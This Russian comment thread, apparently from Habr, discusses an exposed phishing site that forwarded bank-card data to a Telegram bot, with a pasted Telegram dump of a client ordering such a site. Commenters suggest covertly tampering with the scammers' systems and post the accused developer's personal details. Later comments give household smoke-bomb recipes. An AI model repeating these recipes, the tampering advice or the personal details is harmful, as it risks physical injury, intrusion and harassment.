                                                                              >Букинг, например, тоже просит ввести цвв у себя на сайте и мало того, данные карт передает отелям прямым текстом. habr.com/en/post/442378
                                                                              Скажите ещё, что вы пользуетесь этим сайтом для каких-то ещё целей, кроме поиска вариантов отелей?
                                                                              Мне вот почему-то куда больше доверия к цепочке «поискал на букинге=>нашёл отель=>нашёл сайт отеля=>забронировал номер на сайте отеля». Хотя бы по той простой причине, что в таком случае не будет проблем если синхронизация между букингом и отелем сломана/глючит/тормозит, и от этого букинг продаёт брони на уже заселённые в оффлайне на стойке регистрации номера.

                                                                              >ссл сертификата нет? Тоже не признак мошенничества.
                                                                              Но таки верный smell.
                                                                              Если владелец сайта даже в Let'sEncrypt сертификат себе не может — фтопку.

                                                                              >И добивает эту ситуацию тот факт, что прием оплаты зависит от мерчанта. Мерчант может его настроить так, что бы никаких лишних проверок не было и даже cvv не требовался.
                                                                              И таки да, и даже некоторые благотворительные организации таким не брезгуют (пальцем указывать не буду, но столкнулся).

                                                                            +5
                                                                            А то, что Юрик размещал объявления о разработке и продаже фишигового сайта, это чистое совпадение. Если он сделал сайт, прекрасно понимая, что он делает и для кого, то претензии к нему есть и ещё какие.
                                                                              –5
                                                                              а как это доказать? он как я вижу совсем противоположенное пишет и сам сайт уже выключен и находится на украине, так что до него уже не добраться, потому возможно самое оптимальное для ТС, удалить статью и спрятать подальше следы своей работы, по выводу мошенника на чистую воду.
                                                                                +6
                                                                                Выясним, кто создал чат, в который бот отсылает сообщения.

                                                                                Как видно создатель чата имеет такой же username как и сайт создателя — «gelloiss».
                                                                                Ну а создатель чата = @gelioss = Юрий, он в переписке не скрывает, что gelloiss.ru — его сайт, а на сайте всего его профили в соцсетях и мессенджерах…

                                                                                Альтернативная версия какая? Что кто-то был настолько дальновиден, что 4 года назал указал ник и скайп Юрия в объявлении о продаже фишингового сайта, затем создал телеграм-аккаунт с таким же именем и аватаркой, создал с этого аккаунта бота для приёма украденных данных, зарегистрировал ещё один сайт gelloiss.ru, накидал туда ссылок на профили Юрия и ждал годы, пока это вскроется, чтобы подставить Юрия?

                                                                                Вариант «кибермошенники зачастую умом не отличаются» намного вероятнее.
                                                                                  +1
                                                                                  все может быть, даже и такое, а может купил шаблон 4 года назад и до сих пор клепает на нем сайты сливая все на один чат, Вы серьезно думаете, что там всего один сайт в работе?
                                                                                    –1
                                                                                    Ну а создатель чата = @gelioss = Юрий

                                                                                    Допустим, это identity theft?

                                                                                    Альтернативная версия какая?

                                                                                    А «основная» какая — что человек настолько туп, что наследил где только можно, пользуется одним и тем же аккаунтом для личных дел и грязной работы?
                                                                                    0
                                                                                    Это к безопасности ТС относился комментарий, а не тому что бы скрыть следы деятельности этих людей, думаю тут вообще партнёрка, эти сайты уже много лет существуют мне сказали и их много разных, сауны, номера. Область поиска клиентов это сайты СЗ в основном.
                                                                                +4
                                                                                Если докажут, то да.
                                                                                А если поленятся, или окажется, что Юра не при чем, то может попасть и ТС.
                                                                                  +24
                                                                                  для романтичного свидания со своей возлюбленной
                                                                                  А вы её хорошо знаете?
                                                                                  Просто это популярная схема развода: девушка знакомится в сети с молодым человеком, убалтывает его пойти в кино и скидывает ссылку на сайт кинотеатра, ну а дальше — ни денег, ни девушки (конечно, на том конце никакая не девушка, а всё тот же мошенник).
                                                                                    +4
                                                                                    Плюс 1. Тоже слышал о таком разводе
                                                                                      +1
                                                                                      Это не тот случай.
                                                                                      +9
                                                                                      Если не рассматривать вариант обращений в правоохранительные органы или банки, есть вариант расшатать систему сбора денег изнутри — например, добавив на сайт подмену пары произвольных цифр в cvc/cvv на случайные (разумеется, в логи и далее «клиенту» должны выдаваться подменённые данные). Тут уже и банки, и клиенты сами прочухают неладное, а кардеры могут заподозрить «вебмастера» в «измене» и разобраться с ним своими методами. Можно ещё регистратору домена отправить жалобу на владельца домена, чтобы тот его забанил и запретил другие домены регить, хоть это может оказаться неэффективно.
                                                                                        0
                                                                                        У половины таких сайтов «платежные шлюзы» смешные и никакой проверки вводимых данных не осуществляют, ну а дальнейшее сугубо на совести того, кто что в этот шлюз вобьёт.
                                                                                          0
                                                                                          Подавать случайную инфу — это первое, что приходит в голову. Но атака с передачей всех случайных данных не позволит банкам предупредить клиентов о подозрительных транзакциях по карте. А так, когда номер карты будет реальным, а cvv нет, банки-эмитенты быстро увидят, что что-то не так, и заодно начнут копать сами — не через правоохранительные органы, так через международные платёжные системы.
                                                                                          0
                                                                                          Я бы в подобном случае поступил бы именно так. У меня был похожий случай несколько лет назад — и я, так сказать, кое-что подправил мошенникам в их системе. Не знаю, что с ними там стало дальше, но через несколько месяцев их ресурсы и аккаунты перестали функционировать.
                                                                                          +15
                                                                                          Вообще, если тут есть граждане Украины, которые не боятся написать заявление в органы, то вполне можно его написать, в стиле «В сети Интернет на сайте… в статье »..." я прочел о возможных признаках преступления — кражи данных банковских карт. Прошу проверить, имело ли место нарушение закона". Написать, конечно, можно и в российские органы, но боюсь, что заграничные коллеги могут потребовать сначала что-нибудь вернуть что-нибудь отжатое в обмен на преследование преступника.

                                                                                          Можно вбросить ссылку на статью в группу университета Вконтакте — пусть подписчики узнают о «талантливом» одногруппнике. Как плюс, теперь ники и логины товарища хорошо гуглятся.

                                                                                          Ну и отдельно, конечно, поражает то, что все это вообще возможно. Вроде везде проверка паспортов, даже если ты копейки на центы поменять хочешь, к вай-фаю без номера телефона не подсоединиться, а мошенники спокойно заводят какие-то подставные счета, выводят через них деньги и остаются безнаказанными. Как так? Видимо, пока они не финансируют антиправительственные митинги, особого интереса они не вызывают.

                                                                                          Как я понимаю, там есть куча способов снять деньги: перевод на счет сотового телефона, вывод через ставки или казино, покупка криптовалют итд.
                                                                                            +8
                                                                                            Собираюсь это сделать, отпишу про результат обращения
                                                                                              +5
                                                                                              Ну и отдельно, конечно, поражает то, что все это вообще возможно.

                                                                                              Что вы… Сложно представить сколько существует интернет-магазинов, которые продают "ничего" за огромные суммы, а платежи проводят через Яндекс.Деньги. Сам однажды попался на такой в предновогодней суете. Купил "ничего" под видом видеокарты. Неладное почуял довольно быстро, спустя 2 дня, когда чисто случайно решил посмотреть сертификат сайта, а он оказывается был выдан накануне. И главное как грамотно всё было спланировано: абсолютно не вызывающий подозрений домен, ssl-сертификат, огромное количество товаров, личный кабинет с историей заказов, техническая поддержка, платежная система яндекса.
                                                                                              Когда я понял, что я — лох, сразу сообщил в яндекс о мошеннической схеме через их платежку со всеми собранными сведениями: о том, что магазин не существует физически, а по указанному адресу расположен совершенно другой магазин; о том, что приложенные свидетельства и документы на сайте вообще не относятся к деятельности магазина, а принадлежат другим юридическим лицам/фирмам.


                                                                                              Ответ яндекса не заставил ждать, он был в духе: "Да, мы видим ваш платёж, но вернуть деньги не можем, т.к. они уже потрачены на приобретение других услуг Яндекса.". После моего обращения в Яндекс, сайт с их платежкой проработал еще несколько недель, а счет мошенников даже не был заблокирован и они преспокойно продолжали принимать платежи (да, я проверял форму ввода данных о карте, она работала). И сколько человек еще было обокрадено, прежде чем счет был заблокирован? Никто этого не узнает.

                                                                                                +2
                                                                                                Жаловаться хостеру и регистратору домена. Возможно, в РосКомНадзор. Заявление в полицию. Все должны знать, куда (кроме них) ещё ушла жалоба. Но это дело хлопотное. Заявление в полицию — это, скорее всего, ещё как минимум пара вызовов для дачи показаний. Нужно быть готовым «дожимать» ситуацию, тратить на это ресурсы.

                                                                                                Вообще же ХОРОШО сделанные клоны магазинов встречаются часто, да. Не знаю, как сейчас — но раньше даже давали ссылку на раздел настоящего магазина в Яндекс.Маркете (типа, смотрите, у нас пять звёзд, ага). Тогда, несколько лет назад, несовпадение доменных имён на основании информации из раздела было неочевидно (да и сейчас можно взять визуально очень похожее).
                                                                                                  +5

                                                                                                  Я в тот день написал жалобу везде где можно: яндексу, регистратору домена, в РПН, в прокуратуру, в какой-то отдел it-преступлений (точного названия не помню). На счет хостера не помню, скорее всего я на него не вышел.


                                                                                                  Заявление в полицию — это, скорее всего, ещё как минимум пара вызовов для дачи показаний

                                                                                                  Именно так и было. Меня даже попросили принести 2ндфл, а когда следователь (девушка) увидела зарплату за последний месяц, округлила глаза: "И вы жалуетесь на кражу 10 тысяч рублей?". Реакция меня прям в шок повергла. Т.е. если я когда-то получал нормальную зарплату, то жаловаться на преступников, обобравших меня — это прямо как-то низко с моей стороны.

                                                                                                    +1
                                                                                                    Т.е. если я когда-то получал нормальную зарплату, то жаловаться на преступников, обобравших меня — это прямо как-то низко с моей стороны.
                                                                                                    Просто для них чем больше заявлений — тем больше работы (а если случай непростой, то и конечная статистика ухудшается). При этом их оплата от объёма работы зависит не слишком сильно. Поэтому они к заявителям так и относятся. Но, конечно, Вы всё правильно сделали. Чем больше жалоб — тем больше вероятность того, что преступниками займутся быстрее и основательней (и они меньшему количеству добропорядочных граждан успеют нагадить).

                                                                                                    Отечественных хостеров неплохо определяет известный 2ip.ru/guess-hosting

                                                                                                      +3
                                                                                                      их оплата от объёма работы зависит не слишком сильно

                                                                                                      В этом-то и проблема! Ответственность за финансовые преступления должна лежать на тех, кто получает зарплату за то, чтобы эти преступления не совершались.
                                                                                                      Не смогли пресечь преступление? Виновны.
                                                                                                      Не смогли устранить последствия (найти виновников и вернуть украденное) — виновны дважды.
                                                                                                      А то как получается: люди платят налоги, чтобы обеспечить работу всех этих ведомств, созданных защищать нас, а они работу свою не выполняют и зарплату получают исправно и в полном объёме.


                                                                                                      больше вероятность того, что преступниками займутся быстрее

                                                                                                      Самый первый и ответственный шаг должны были сделать сотрудники безопасности Яндекса, они, когда согласились с тем, что имеются признаки мошенничества, могли приостановить транзакции, но этого не было сделано.


                                                                                                      Вообще вся эта система дырявая. Как пример — телефонные мошенники со своими смс-ками "вам зачислено 100 рублей". Когда сообщаешь оператору о мошенничестве, они просто блокируют номер. Всё. Дальше никто ничего не делает.


                                                                                                      Почему операторы не инициируют процесс поимки преступника? Ведь мошенник использовал их сервисы. Им проще всего: они уже знают на кого зарегистрирована сим-карта (могут и не знать, да), они могут отследить где примерно карта была активирована, когда была активирована, где была активность этой карты. Могут отследить трафик, проанализировать записи разговоров, посмотреть на какие счета переводились деньги и т.д. и т.п. Во всяком случае они могут не делать всего этого сами, они могут просто передать архив данных в соответствующие органы, но вместо этого они говорят: "Вы можете самостоятельно написать заявление в прокуратуру для возбуждения дела". Но по факту я не являюсь жертвой, ведь я не передал деньги преступнику. С чем я должен обращаться в органы? С тем что меня пытались обмануть, но ничего не вышло. Ну не вышло и не вышло, такое дело даже рассматривать не станут.
                                                                                                      Жертва тут — оператор, чьими услугами воспользовались, чтобы осуществлять незаконную деятельность. Но им пофиг, с них не убудет, они свой процентик за переводы получают и ладно. Так быть не должно.
                                                                                                      С Яндексом аналогично, только они даже не посчитали нужным вовремя заблокировать счет.

                                                                                                    0
                                                                                                    Хостер и регистратор (по крайней мере, reg.ru) будут блокировать сайт только в результате обращения из полиции (из личного опыта).
                                                                                                      +1
                                                                                                      И это хорошо!(с)
                                                                                                    0
                                                                                                    Ну, SSL-сертификат сейчас, в эпоху Let's Encrypt, не сказать чтобы является критерием подозрительности (если, конечно, он был выдан их CA): перевыпускаются они в штатном режиме достаточно часто. А вот документы магазина проверять не мешает.
                                                                                                      0
                                                                                                      Я не сильно разбираюсь в этом, но вроде это был не Let's Encrypt.
                                                                                                      +2
                                                                                                      Меня яндекс также послал (в полицию), когда мне продали левый ключ от игры, однако удалось вернуть деньги через мой банк (Тинькофф). С тех пор предпочитаю не покупать в онлайн-магазинах, которые принимают оплату через яндекс деньги.
                                                                                                      +2
                                                                                                      На сайте киберполиции Украины создал обращение о возможном правонарушении со ссылкой на статью. Сомневаюсь конечно что от этого будет какой то толк, но все же.
                                                                                                      0
                                                                                                      … данные банковской карты предлагалось ввести на не защищенной странице этого же домена.

                                                                                                      А что мешает злоумышленникам прицепить https и «принимать платежи» на «безопасной странице»? )
                                                                                                        +7

                                                                                                        Жадность и лень, видимо)

                                                                                                          0
                                                                                                          Жадность поставить бесплатный сертификат?
                                                                                                            +1

                                                                                                            Жадность купить платный. Лень разобраться с let's encrypt.

                                                                                                              0
                                                                                                              Включил let's encrypt в панели управления Direct admin.
                                                                                                          0
                                                                                                          А есть и такие клованы, только сам шлюз у них смешной слишком.
                                                                                                          +9
                                                                                                          Сейчас кредитную карту вообще опасно доставать. Чисто случайно нашел в открытом доступе архив видео с камер наблюдений мелкого супермаркета… 3 камеры стояли над кассами и снимали их крупным планом — разрешения камер хватало, чтоб прекрасно видеть номер карты, которой оплачивают покупки а так же имя и прочие данные. И некоторые покупатели крутили ей, когда вставляли в ридер. Так что код тоже прекрасно был видим. Конечно процент таких покупателей весьма невелик — многие платили наличкой, но из любопытства я смог выцепить на видео 4 карты со всеми данными, отсмотрев примерно 3 часа с промотками… Поскольку такие камеры есть везде, почти в любом магазине — это мягко говоря напрягает… хрен его знает, где потом это видео всплывет, ведь оно обычно никак не защищено. Это песец, товарищи ((
                                                                                                          А в интернете если где-то плачу — предпочитаю использовать одноразовые виртуальные кредитки.
                                                                                                            +1
                                                                                                            «крутили ей, когда вставляли в ридер. Так что код тоже прекрасно был видим»

                                                                                                            Берется пломбировочная наклейка, наклеивается на код, если просвечивает — дополнительно уже на ней маркером закрашивается место.

                                                                                                            Можете даже официанту ее после этого отдать (хотя сейчас уже практически неактуально, они обычно с терминалом приходят), сразу будет видна попытка отклеить, если она, конечно, будет предприниматься.
                                                                                                              +4

                                                                                                              Я например с момента получения карты, сразу соскреб CVC код и нарисовал вместо него другие цифры.

                                                                                                                0
                                                                                                                Прошитому терминалу похрен. Дамп есть.
                                                                                                                  0
                                                                                                                  Дамп есть если только платить магнитной полосой. А её можно и размагнитить.
                                                                                                                    0
                                                                                                                    Чтобы потом приехать в какую-нибудь страну типа Японии и остаться без возможности платить карточкой совсем :-)
                                                                                                                      +1
                                                                                                                      Если у вас одна-единственная карта на все случаи жизни, то это, мягко говоря, непредусмотрительно.
                                                                                                              +11

                                                                                                              Резюме: какер погорел на том, что не настроил let's encrypt на фишинговом сайте )))


                                                                                                              Но автору все равно респект. Прочитал с большим удовольствием )

                                                                                                                –1
                                                                                                                Статья интересная, идти в органы не стоит, они сами должны такие статьи на популярных ресурсах находить и изучать и добытую информацию и как надо работать
                                                                                                                  +10
                                                                                                                  Юра, перелогинься!
                                                                                                                  +1
                                                                                                                  А вот интересно, можно им туда honeypot карточек в базу напихать?
                                                                                                                    +4
                                                                                                                    Нормальное, такое, романтическое свидание вышло. Девушка осталась довольна? :)
                                                                                                                      +15

                                                                                                                      Как в известном анекдоте:


                                                                                                                      • Давай трахаться?
                                                                                                                      • Забей, смотри лучше какого я хакера поймал )))
                                                                                                                      +1
                                                                                                                      Вот так обострённое чувство справедливости и человеческая порядочность привели человека на путь white hat. Надеюсь, что «Продолжение следует», как нам сообщил автор.
                                                                                                                        +4
                                                                                                                        С таким White Hat может быть очень грустное продолжение (достаточно маловероятное, но реальное): если данные этих карт будут использованы для мошенничества или кражи денег (что особенно неприятно), то влететь может автору: он имел доступ к этим данным, повзаимодействал с ними, сохранил их, плюс искать его может быть проще, чем создателей сайта.
                                                                                                                        +2
                                                                                                                        Я так понял, что это украинцы безобразничают?
                                                                                                                          +3
                                                                                                                          Юра уже удалил страницу ВКонтакте
                                                                                                                            +2

                                                                                                                            Штирлитц еще никогда не был так близко к провалу!

                                                                                                                              +3
                                                                                                                              еще вчера, через пару часов после публикации этой статьи. Слишком много гневных смс поступило)
                                                                                                                              –42
                                                                                                                              Мда, автор…
                                                                                                                              Улов у тебя — ерши сопливые.
                                                                                                                              Методы твои — незаконные.
                                                                                                                              Статейку лучше удали, от греха.
                                                                                                                                –10
                                                                                                                                Кулхацкеры и неуловимые аноны негодуют. Однако, дружеский совет остается в силе.
                                                                                                                                  –2
                                                                                                                                  Слив защитан)
                                                                                                                                  +4
                                                                                                                                  Статья классная и проделана реально хорошая работа, мне нравится)
                                                                                                                                  Но есть один нюанс. Я не создатель и даже не участник этой группы.
                                                                                                                                  Ко мне поступил заказ на zismo.biz, довольно давно, кстати и я его просто выполнил.
                                                                                                                                  Сам заказ был в том, чтобы перенести их сайт с тильды на «свой хостинг» и написать простую админку для публикации фильмов и тп. Никаких карт не было, оплата у них была через яндекс, так что я и не знал, что они мошенники. Бот использовался для оповещений о новых заказах, поставил со своего аккаунта, ибо так было проще.
                                                                                                                                  Все мои переписки с ними сохранились и в случае чего я смогу их показать.
                                                                                                                                  Просто видимо сайт переделали. К тому же, там ссылка на меня была не только в админке, но и на главной. Если тс ее не увидел, то мб и ее убрали.

                                                                                                                                  Если есть какие-то вопросы — пишите, отвечу)
                                                                                                                                    0
                                                                                                                                    Принадлежит ли сайт gelloiss.ru Вам?
                                                                                                                                      0
                                                                                                                                      Да. Можете перейти на сайт из поста, для удостоверения в этом)
                                                                                                                                      (Именно с поста, вручную вводить в строку не выйдет)
                                                                                                                                        0
                                                                                                                                        Принадлежит ли telegram аккаунт gelloiss Вам в настоящее время?
                                                                                                                                          –2
                                                                                                                                          У Вас же это в статье есть. Я просто говорю, что не связан с заказчиками никак кроме «выполнил, установил все и настроил, отдал сайт». Иногда фиксил баги поначалу. Да и я не знал, для каких конкретно целей сайт будет использоваться.
                                                                                                                                          Обвинять меня в краже персональных данных неправильно.
                                                                                                                                            +1
                                                                                                                                            Обвинять меня в краже персональных данных неправильно.

                                                                                                                                            Это еще предстоит выяснить.
                                                                                                                                            Если я правильно Вас понял, то Вы утверждаете, что получали ФИО, номера телефонов, номера банковских карт в свой телеграмм, но не знали для каких целей они используются?
                                                                                                                                              –2
                                                                                                                                              Лично я не получал ничего. Бот, созданный от моего аккаунта, мог отправлять что угодно и кому угодно, т.к. токен был не у одного заказчика.
                                                                                                                                              Сейчас токен сменен и никто ничего от него отправлять больше не будет.
                                                                                                                                                –2
                                                                                                                                                Лично я не получал ничего. Бот, созданный от моего аккаунта, мог отправлять что угодно и кому угодно, т.к. токен был не у одного заказчика.

                                                                                                                                                Хорошо — я вам верю.
                                                                                                                                                Сможете ли убедить автора статьи?
                                                                                                                                                  0
                                                                                                                                                  А надо ли? Здесь лучше убедить кого-то другого, т.к. автор статьи явно нарушил несколько статей. Как минимум: pravo.rg.ru/rubrics/question/3446

                                                                                                                                                  Если мне надо будет кого-то убедить в своей невиновности, то это точно будет не ТС. Ну и если надо будет, то сделаю) У меня все переписки сохранены с заказчиками. Доступов и сохраненных карт или чего-то подобного тоже нет, так что проблем пока не вижу.
                                                                                                                                                    0
                                                                                                                                                    >У меня все переписки сохранены с заказчиками.
                                                                                                                                                    А вы сможете неоспоримо доказать при необходимости (не будем обсуждать при какой именно), что все эти сохранённые переписки действительно имели место в реальности?
                                                                                                                                              +14
                                                                                                                                              Да и я не знал, для каких конкретно целей сайт будет использоваться.

                                                                                                                                              Я бы поверил, если бы не диалог в telegram. Уверен, вы прекрасно знали для каких целей используется созданный Вами сайт.
                                                                                                                                              Извините за вид, сохранился только дамп:
                                                                                                                                              dump
                                                                                                                                              Message(id=31, grouped_id=None, from_id=898775249, edit_date=None, message='Короче нужен сайт по «переводу карты на карту без комиссии» естесственно он должен высылать данные карты и код подтверждения мне', to_id=PeerUser(user_id=365019332), entities=[], fwd_from=None, views=None, media=None, post=False, media_unread=False, out=True, date=datetime.datetime(2019, 4, 19, 9, 36, 15, tzinfo=datetime.timezone.utc), silent=False, via_bot_id=None, post_author=None, reply_to_msg_id=None, from_scheduled=False, mentioned=False, reply_markup=None),

                                                                                                                                              Message(id=33, grouped_id=None, from_id=365019332, edit_date=None, message='moneyonline.world/pay/?pay=123\nТипа этого?)) \nДанные в телегу приходят', to_id=PeerUser(user_id=898775249), entities=[MessageEntityUrl(offset=0, length=38)], fwd_from=None, views=None, media=MessageMediaWebPage(webpage=WebPage(id=8004451420650727228, hash=0, photo=None, description='MoneyOnline.com ‒ это платежная система для тех, кто зарабатывает в интернете. Электронный кошелек, прием платежей и вывод денег, денежные переводы. Мгновенная регистрация, выгодные комиссии.', embed_height=None, embed_width=None, document=None, embed_type=None, site_name='MoneyOnline', cached_page=None, url='https://moneyonline.world/pay/?pay=123', display_url='moneyonline.world/ru', duration=None, author=None, embed_url=None, title='MoneyOnline | Электронный кошелек, платежи, прием и вывод денежных средств', type='article')), post=False, media_unread=False, out=False, date=datetime.datetime(2019, 4, 19, 9, 37, 53, tzinfo=datetime.timezone.utc), silent=False, via_bot_id=None, post_author=None, reply_to_msg_id=None, from_scheduled=False, mentioned=False, reply_markup=None),
                                                                                                                                                –9
                                                                                                                                                Не знал.
                                                                                                                                                Со слов заказчика moneyonline, сайт использовался для перепродажи товаров. Т.е. у него заказывали банк. карты, он получал оплату и заказывал дешевле в других местах.
                                                                                                                                                Также и Вы при заказе не уточняли с какой целью Вам нужен сайт. Это не единичный случай, когда люди просят написать какую-то подобную платежку, потому что не могут или не выгодно связываться с официальными, при этом они никого «не кидают на деньги».

                                                                                                                                                В статье Вы обвиняете меня в том, что я лично собирал данные карт, снимал с них деньги и т.д. Но нет, я лишь написал сайт на заказ и все. Вы не нашли никаких реальных мошенников, и даже то, что Вы вышли на меня не позволит найти их, ведь все, что у меня есть — аккаунты телеграмма, два из которых уже удалены.

                                                                                                                                                Вы же не станете обвинять фирму, создавшую интернет магазин, который отправляет, например, подделку? Нет, ведь фирма к этому никакого отношения не имеет.
                                                                                                                                                Также и у меня. При том, после статьи, я сразу отключил бота и он больше не сможет отправлять заказчикам данные, потому что я не хочу быть замешан в этом.
                                                                                                                                                  +4
                                                                                                                                                  Юрий Андреевич, так ты даже в своем колледже (ХПКК група П-51) внаглую обманываешь преподавателя и сам же это постишь pikabu.ru/story/kak_otvetit_prepodu_ne_vyigovarivaya_ni_zvuka_6639791 или это не ты? Или же ты думаешь что Панченко будет вместо тебя будет отвечать и дальше?

                                                                                                                                                  Со слов заказчика говоришь, как то очень быстро «твой» заказчик подчистил сайт…
                                                                                                                                                    –8
                                                                                                                                                    Лол, давайте сюда еще забавную ситуацию приплетем с колледжа?)))
                                                                                                                                                    А Вы никогда не говорили преподавателю, что заболели или проспали, когда на самом деле просто было лень идти? И что, Вы теперь тоже обманщик и будущий преступник? Кстати, это не Кривошеев…

                                                                                                                                                    Я отключил бота и заказчик заинтересовался этим, прочел статью. Причину отключения сайта не знаю. Могу предположить, что на него обрушилось большое количество гневных писем.
                                                                                                                                                    +1
                                                                                                                                                    PCI DSS? Законодательство (украинское тоже) по противодействию отмыванию денег? Как в этих условиях в принципе что-то обналичивать? Неа, не слышал и не думал…
                                                                                                                                                      –4
                                                                                                                                                      Этот вопрос адресован мне? Если да, то, извини, не понял вопроса.
                                                                                                                                                      +1
                                                                                                                                                      Парой комментов выше была оплата по яндексу, теперь отправка платёжных данных в телегу

                                                                                                                                                      Для каких вообще легальных действий может понадобиться отправка платёжных данных клиента в телегу?
                                                                                                                                                        –4

                                                                                                                                                        Здесь речь шла о двух разных сайтах.
                                                                                                                                                        И я же описал для каких. Ну так мне говорили. Я сильно не расспрашивал. Есть работа, делаю.
                                                                                                                                                        Исключения были, когда заранее 100% понимаю, что черная тема.

                                                                                                                                                          –3
                                                                                                                                                          Для каких вообще легальных действий может понадобиться отправка платёжных данных клиента в телегу?
                                                                                                                                                          А что именно Вас тут удивляет?
                                                                                                                                                          То что данные уходят в 3rd-party контору? Так это достаточно частая практика, у нас заказы бывают и в скайп посылать и по смс и даже просто в личку на другой форум. Не очень безопасно, но никак не уголовно.
                                                                                                                                                          То что данные уходят в открытом виде и полностью, а не перекидывает на оплату на сайт банка сразу? Это тоже частая ситуация, когда процессинг наполовину ручной. Те же агрегаторы продажи авиабилетов или букинг (мы где-то писали выше), они в момент непосредственной покупки у поставщика вводят эти клиентские данные и они им нужны полностью у себя что бы их ввести. Опять же, не очень безопасно, но вряд ли уголовно.

                                                                                                                                                          Понимаете в чем штука. Проблема со всеми мошенниками в том, что для своей эффективной деятельности они максимально маскируются под честные методы ведения бизнеса. Поэтому в подавляющем большинстве случаев, если мошенник не идиот, 99% его действий объясняется в рамках сложившейся деловой практики, пусть даже она несколько сомнительна в плане безопасности и белости.
                                                                                                                                                            0

                                                                                                                                                            Вы так и не ответили, зачем это нужно.
                                                                                                                                                            Если нужно просто хранить данные карты клиента, что бы ему было удобнее — тогда должен быть вопрос, нужно ли сохранять карту


                                                                                                                                                            и при этом не нужно хранить (знаю, что это не панацея, но всё же)

                                                                                                                                                              +1
                                                                                                                                                              Международные платёжные системы очень жёстко регулируют, какие данные и какие их клиенты (зависит от уровня сертификации клиента) могут сохранять. И сохранение ВСЕХ данных карты в открытом виде стоит нереально дорого, и поэтому не применяется честными сайтами (практически все честные сайты пользуются сертифицированными крупными платёжными агрегаторами)
                                                                                                                                                              +1
                                                                                                                                                              Для хранения данных карты нужна сертификация PCI DSS, просто так по желанию левой ноги это не делается.
                                                                                                                                                                +2
                                                                                                                                                                Booking.com с отельерами тоже об этом знают, или нет?
                                                                                                                                                              0
                                                                                                                                                              Для каких вообще легальных действий может понадобиться отправка платёжных данных клиента в телегу?


                                                                                                                                                              В принципе можно придумать такие схемы. Например, дропшиппинг, если дропшиппер очень хочет сэкономить (типа получает заказ, потом с карты клиента на его адрес покупает на Aliexpress). Но что-то я сомневаюсь, что это распространенный сценарий.
                                                                                                                                                                +2

                                                                                                                                                                … если дропшиппер очень хочет сэкономить, получает заказ и данные кредитки, и потом просто снимает с неё деньги

                                                                                                                                                                  0
                                                                                                                                                                  100% экономия. Но я о том, что можно придумать легальные способы использования данных подобным образом. Они маловероятны, но придумать можно.
                                                                                                                                                                    0

                                                                                                                                                                    Ага.
                                                                                                                                                                    Но можно уже не придумывать, в соседней ветке выложили скрины, где объект исследования прямо предлагает фишинговые сайты на продажу

                                                                                                                                                  0
                                                                                                                                                  А чё теперь на хабре коменты писать может любой, кто просто зарегается?
                                                                                                                                                    0
                                                                                                                                                    Да.
                                                                                                                                                      0
                                                                                                                                                      Видимо и минусить теперь тоже могут, раз за такой вопрос уже минусят )

                                                                                                                                                      При Билли Гейтсе такого не было!
                                                                                                                                                        +2
                                                                                                                                                        Нет, не могут.
                                                                                                                                                        А комменты лишь после модерации появляются.
                                                                                                                                                          0
                                                                                                                                                          Писать-то могут. Публикует либо автор, либо (вроде как) модератор. Раньше вы бы при желании ничего не написали, и никто бы волшебную кнопку не нажал.
                                                                                                                                                            0

                                                                                                                                                            Какую кнопку?

                                                                                                                                                              0
                                                                                                                                                              Которая опубликует ваш комментарий для широкой публики, не только автора поста и администрации.
                                                                                                                                                    +17
                                                                                                                                                    image
                                                                                                                                                    А это марсиане продавали фишинговый сайт от вашего имени?

                                                                                                                                                    PS просто из любопытства — сон нормальный? Не страшно по улице ходить?
                                                                                                                                                      –17

                                                                                                                                                      Посмотрите на дату. Посмотрите на мой последний визит и вообще время проведенное на том форуме.
                                                                                                                                                      Честно, я до этого поста и забыл об этом. На идею меня толкнул одноклассник (Да, я тогда еще был классе в 8), типа пошутить над другом. Потом решил попробовать вдруг получится продать, может кому надо))
                                                                                                                                                      Было продано 0 копий, ни один аккаунт не пострадал.

                                                                                                                                                        +11
                                                                                                                                                        Ничего себе шуточки… лет на семь строгого режима.

                                                                                                                                                        Мы в восьмом классе по другому шутили. Карбид в лужу, дымовушку из селитры в женский туалет в школе кинуть.
                                                                                                                                                          –2

                                                                                                                                                          Ничего себе шуточки… лет на семь строгого режима или сколько там за изготовление взрывчатых веществ?

                                                                                                                                                            +3
                                                                                                                                                            эх молодо зелено… пищевая сода + аммиачная ( можно и натриевая, но она хуже дымит ) селитра + горячая вода. Замачивать газету в этом растворе, потом сушить на батареи. Потом свернуть в плотную трубочку и обмотать фольгой.
                                                                                                                                                            это не ВВ, просто дымит прикольно.
                                                                                                                                                            А в моем детстве селитра свободно продавалась в промтоварах для огородников.
                                                                                                                                                              +1
                                                                                                                                                              эх молодо зелено

                                                                                                                                                              Гидроперит+фиксаж = много дыма.
                                                                                                                                                                0
                                                                                                                                                                А разве фиксаж всё ещё продаётся?
                                                                                                                                                                Давайте уж по-взрослому:
                                                                                                                                                                coollib.net/b/212132/read
                                                                                                                                                                  +1
                                                                                                                                                                  Замени на анальгин) Из той же аптеки) Воняет жутко только.
                                                                                                                                                                    0
                                                                                                                                                                    В этом то и прикол)
                                                                                                                                                                    А реакция начинается после пары-тройки минут на батарее (или в любом другом тёплом месте))
                                                                                                                                                                      0
                                                                                                                                                                      Или минут 15 просто при комнатной температуре :D Эх, школа…
                                                                                                                                                                  0
                                                                                                                                                                  Магазин фототоваров был на другом конце города. А промтовары в 10 минутах.
                                                                                                                                                                  Еще ближе был магазин музыкальных товаров где продавались гитарные медиаторы 2 штуки за копейку. Мы их мелко резали и в бумажку, если поджечь то тоже много дыма.
                                                                                                                                                                    +2
                                                                                                                                                                    Мы их мелко резали и в бумажку, если поджечь то тоже много дыма.

                                                                                                                                                                    А если в фольгу то и ещё летающего по непредсказуемой траектории.
                                                                                                                                                                      +4
                                                                                                                                                                      А если в обёртке из фольги сделать хвостик для выхода дыма\газов, то даже и по достаточно предсказуемой.
                                                                                                                                                                      0
                                                                                                                                                                      Линейки были и треугольники пластиковые из того же материала что и медиаторы. И стоили они на порядок дешевле в пересчете на массу материала.
                                                                                                                                                                      Но зачем их покупать если можно у одноклассников отжать :) или родителям втереть что такая линейка нужна ибо старая сломалась.
                                                                                                                                                                    0
                                                                                                                                                                    сарказм не прошел :(

                                                                                                                                                                    Но вообщем у каждого поколения свою «шуточки» на грани фола и не понятны предыдущему.
                                                                                                                                                                      0
                                                                                                                                                                      А в моем детстве селитра свободно продавалась в промтоварах для огородников.

                                                                                                                                                                      Она и сейчас продаётся, причём именно аммиачная никуда из продажи и не исчезала. Вот калийной некоторое время не было, но сейчас и она продаётся.
                                                                                                                                                              0
